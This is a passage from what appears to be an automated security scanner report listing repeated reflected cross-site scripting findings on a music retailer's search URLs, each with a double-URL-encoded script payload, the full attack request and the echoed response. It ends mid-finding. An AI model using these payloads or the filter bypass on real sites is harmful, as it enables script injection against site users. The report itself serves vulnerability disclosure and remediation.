The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nation%20of%20Ulyssesd9e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87da78ad881&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6mq9r5r48hgk366c8jiuiqj7b5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272835791; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=388604899; expires=Sun, 09-Jan-2011 02:38:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nation of Ulyssesd9e0a"><script>alert(1)</script>87da78ad881" />
...[SNIP]...

1.207. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Eye&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6686dec5e6 was submitted in the REST URL parameter 3. This input was echoed as 8c3e9"><script>alert(1)</script>6686dec5e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Eye8c3e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6686dec5e6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o52d3sebfl3au5upf58b1s9j73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=392380351; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=343064794; expires=Sun, 09-Jan-2011 02:38:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="National Eye8c3e9"><script>alert(1)</script>6686dec5e6" />
...[SNIP]...

1.208. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Eye&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 32d97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f1dbac9e14 was submitted in the REST URL parameter 3. This input was echoed as 32d97</title><script>alert(1)</script>3f1dbac9e14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Eye32d97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f1dbac9e14&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=frddajcp8urpalofd7gqn4d335; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48634354; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=205296198; expires=Sun, 09-Jan-2011 02:38:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>National Eye32d97</title><script>alert(1)</script>3f1dbac9e14</title>
...[SNIP]...

1.209. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Skyline&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e69e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ad75e72550 was submitted in the REST URL parameter 3. This input was echoed as 4e69e"><script>alert(1)</script>9ad75e72550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Skyline4e69e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ad75e72550&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ttav72ulh9276n42m108tkf1c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=62124800; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=445664358; expires=Sun, 09-Jan-2011 02:38:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="National Skyline4e69e"><script>alert(1)</script>9ad75e72550" />
...[SNIP]...

1.210. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/National%20Skyline&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b5e53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee040bd8f7c8 was submitted in the REST URL parameter 3. This input was echoed as b5e53</title><script>alert(1)</script>e040bd8f7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/National%20Skylineb5e53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee040bd8f7c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lmmqjurphc9mcddli0uo5mp5a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=365740917; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=216838963; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>National Skylineb5e53</title><script>alert(1)</script>e040bd8f7c8</title>
...[SNIP]...

1.211. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nationale%20Blue&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 99a69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eccbe7d5e415 was submitted in the REST URL parameter 3. This input was echoed as 99a69</title><script>alert(1)</script>ccbe7d5e415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nationale%20Blue99a69%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eccbe7d5e415&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pfidoh165fcpdq5ravhs7h6h80; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=15049276; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=188383749; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nationale Blue99a69</title><script>alert(1)</script>ccbe7d5e415</title>
...[SNIP]...

1.212. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nationale%20Blue&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27054%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3047c3c357f was submitted in the REST URL parameter 3. This input was echoed as 27054"><script>alert(1)</script>3047c3c357f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nationale%20Blue27054%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3047c3c357f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2fvhukqi31fm1qn0qh77t1iit7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=8846503; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=567727028; expires=Sun, 09-Jan-2011 02:38:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nationale Blue27054"><script>alert(1)</script>3047c3c357f" />
...[SNIP]...

1.213. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nations%20by%20the%20River&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 247ad%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50d1ed31388 was submitted in the REST URL parameter 3. This input was echoed as 247ad</title><script>alert(1)</script>50d1ed31388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nations%20by%20the%20River247ad%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50d1ed31388&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tc2hfv7adief3atm22vde7ldk4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=166038235; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=401128642; expires=Sun, 09-Jan-2011 02:38:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nations by the River247ad</title><script>alert(1)</script>50d1ed31388</title>
...[SNIP]...

1.214. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nations%20by%20the%20River&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f0d5ee781 was submitted in the REST URL parameter 3. This input was echoed as b4bc8"><script>alert(1)</script>c3f0d5ee781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nations%20by%20the%20Riverb4bc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f0d5ee781&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=11qn9rm8khr2u8fgdufq57fd70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=145059695; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=499471972; expires=Sun, 09-Jan-2011 02:38:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nations by the Riverb4bc8"><script>alert(1)</script>c3f0d5ee781" />
...[SNIP]...

1.215. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native%20Fauna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e348b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efbc26b6fab2 was submitted in the REST URL parameter 3. This input was echoed as e348b</title><script>alert(1)</script>fbc26b6fab2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Native%20Faunae348b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efbc26b6fab2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rfq15u5sv8obpmh8j5kprnfl60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=328463182; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=491654982; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Native Faunae348b</title><script>alert(1)</script>fbc26b6fab2</title>
...[SNIP]...

1.216. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native%20Fauna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d58%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7780609dff2 was submitted in the REST URL parameter 3. This input was echoed as f7d58"><script>alert(1)</script>7780609dff2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Native%20Faunaf7d58%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7780609dff2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c2ukct1dnph6plkd2011mkf015; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=450730841; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=427320983; expires=Sun, 09-Jan-2011 02:38:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Native Faunaf7d58"><script>alert(1)</script>7780609dff2" />
...[SNIP]...

1.217. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload def8c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46ad35eb0a3 was submitted in the REST URL parameter 3. This input was echoed as def8c"><script>alert(1)</script>46ad35eb0a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nativedef8c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46ad35eb0a3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tul00h5nau95ko1q4ouk2h0ci6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=263542766; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=174046510; expires=Sun, 09-Jan-2011 02:38:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nativedef8c"><script>alert(1)</script>46ad35eb0a3" />
...[SNIP]...

1.218. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Native&from=47597/

Issue detail

